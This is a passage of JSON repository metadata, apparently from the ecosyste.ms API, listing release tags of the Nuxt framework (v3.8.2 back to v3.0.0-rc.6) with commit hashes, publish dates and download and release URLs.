hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/